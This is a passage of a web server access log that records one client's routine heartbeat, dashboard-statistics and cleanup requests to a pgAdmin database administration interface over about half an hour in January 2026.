(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:06:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:07:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:07:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:08:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:08:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:09:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:09:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:10:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:10:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:11:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:12:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:12:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:13:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:13:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:14:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:14:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:15:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:15:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:16:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:17:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:17:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:18:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:18:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:19:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:19:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:20:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:20:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:21:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:22:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:22:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:23:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:23:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:24:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:24:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:25:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:25:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:26:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:27:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:27:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:28:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:28:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:29:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:29:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:30:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:30:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:31:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:32:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:32:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:33:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:33:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:34:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:34:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:35:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:35:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:36:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:37:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:37:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:38:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:38:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:39:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:39:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:40:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:10:40:55 +0000] - 200 200 - GET https 